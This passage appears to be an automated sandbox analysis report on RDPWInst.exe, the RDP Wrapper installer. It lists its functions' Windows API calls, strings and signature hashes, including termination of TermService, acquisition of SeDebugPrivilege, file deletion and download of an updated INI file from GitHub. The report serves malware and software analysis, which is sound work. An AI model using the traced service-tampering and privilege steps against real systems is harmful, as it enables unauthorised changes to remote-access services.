                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DiskFreeSpace
                                                                                                              • String ID:
                                                                                                              • API String ID: 1705453755-0
                                                                                                              • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                              • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                                              • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                              • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                                              Function 00412C4C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                              • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                                              • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                              • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                                              Function 00412C4A Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                              • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                                              • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                              • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                                              Function 00412C98 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 2299586839-0
                                                                                                              • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                              • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                                              • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                              • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                                              Function 00411154 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 481472006-0
                                                                                                              • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                              • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                                              • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                              • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                                              Function 00417D30 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                                                • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                              • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                              • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                                                                              • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                              • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                                                                              Function 0043AE28 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 140serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                              • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                                              • API String ID: 48634454-3812534468
                                                                                                              • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                              • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                                                                              • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                              • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                                                                              Function 0043F7A4 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 229sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                                • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                              • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                                              • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                                                • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                                              • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                                              • API String ID: 3534747103-2332903941
                                                                                                              • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                              • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                                                                              • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                              • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                                                                              Function 0043D938 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 141fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                                              • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                                              • API String ID: 1427661212-4281953003
                                                                                                              • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                              • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                                                                              • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                              • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                                                                              Function 0041344C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97filewindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                                              • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                                              • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                                              • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                              • String ID: $sD$(4A$LpD
                                                                                                              • API String ID: 135118572-2961882766
                                                                                                              • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                              • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                                                                              • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                              • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                                                                              Function 00409E82 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 183libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                                              • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                                              • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                                              • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                                              • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                                              • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                                              • GetLastError.KERNEL32 ref: 0040A031
                                                                                                              • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                                                • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                                                • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
